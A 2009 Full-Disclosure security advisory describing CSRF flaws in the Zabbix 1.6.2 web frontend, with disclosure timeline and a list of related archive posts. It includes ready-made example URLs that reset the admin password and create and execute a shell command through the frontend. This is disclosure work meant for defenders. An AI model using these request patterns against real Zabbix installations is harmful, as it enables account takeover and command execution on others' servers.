[Full-disclosure] Zabbix Multiple Frontend CSRF (Password reset & command execution)

nGenuity Information Services - Security Advisory

Advisory ID: NGENUITY-2009-006 - Zabbix Multiple Frontend CSRF
Application: Zabbix 1.6.2
Vendor: Zabbix
Vendor website: http://www.zabbix.com
Author: Adam Baldwin (adam_baldwin@xxxxxxxxxxxxxxx)

I. BACKGROUND
"ZABBIX is an enterprise-class open source distributed monitoring solution." [1]

II. DETAILS
Multiple Cross-Site Request Forgery (CSRF) vulnerabilities exist that can allow for the following
attack scenarios to be executed should an administrator with a valid session visit a malicious page
or url.

1. Reset admin password
2. Execution of shell commands

Reset Admin Password:
Zabbix does not validate a users old password before the new password is set using a request
similar to the below request. Some of the parameters are not required for the request to be
valid.

Example: http://example.com/zabbix/profile.php?autologout=900&change_password=Change%20password
&config=0&form=1&form_refresh=2&lang=en_gb&password1=aaaaaa&password2=aaaaaa&refresh=30
&save=Save&theme=default.css&url=&userid=1

Execution of Shell Commands:
A two staged approach is required to execute arbitrary shell commands. First the custom command to
be executed has to be created and then that command has to be executed. Below is an example of how
these requests could be executed.

Example: Setting the command
http://example.com/zabbix/scripts.php?action=1&access=2&command=touch%20/tmp/zabbix&form=1
&form_refresh=1&form_refresh=1&groupid=0&name=Ping&save=Save&scriptid=1&usrgrpid=0

Example: Executing the command
http://example.com/zabbix/scripts_exec.php?execute=1&hostid=10017&scriptid=1

III. REFERENCES
[1] - http://www.zabbix.com

IV. VENDOR COMMUNICATION
3.22.2009 - Vulnerability Discovery
3.23.2009 - Vendor response. Fixed in 1.6.3 (unconfirmed)

Copyright (c) 2009 nGenuity Information Services, LLC
http://www.ngenuity.org/wordpress/2009/03/30/ngenuity-2009-006-zabbix-multiple-frontend-csrf/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • Zabbix Multiple Frontend CSRF (Password reset & command execution)
    ... Multiple Cross-Site Request Forgery vulnerabilities exist that can allow for the following ... Reset Admin Password: ... Execution of Shell Commands: ... be executed has to be created and then that command has to be executed. ...
    (Bugtraq)
  • Re: ksh silently ignores function if mistakenly not autoloaded
    ... Here's the order of execution. ... This really takes place prior to command ... Shell scripts, with all their power, have one major drawback - they ... In the Korn Shell, there are two separate syntaxes for defining ...
    (comp.unix.shell)
  • [PATCH] ide-cd: fix some codestyle and most of the checkpatch.pl issues
    ... Generic packet command support and error handling routines. ... -/* Returns 0 if the request should be continued. ... HANDLER is the routine ...
    (Linux-Kernel)
  • [PATCH 32/32] ide-tape: cleanup the remaining codestyle issues
    ... * After each failed packet command we issue a request sense command and retry ... * The following parameter is used to select the point in the internal tape fifo ... int merge_stage_sz; ...
    (Linux-Kernel)
  • Re: breaking the model
    ... The docs also say that Server.Transfer stops execution of the previous ... > webform page. ... The execution of the HTTP Request is handed off to another Page ... >> The ASP.Net object model is designed to work something like a Windows ...
    (microsoft.public.dotnet.framework.aspnet)
Loading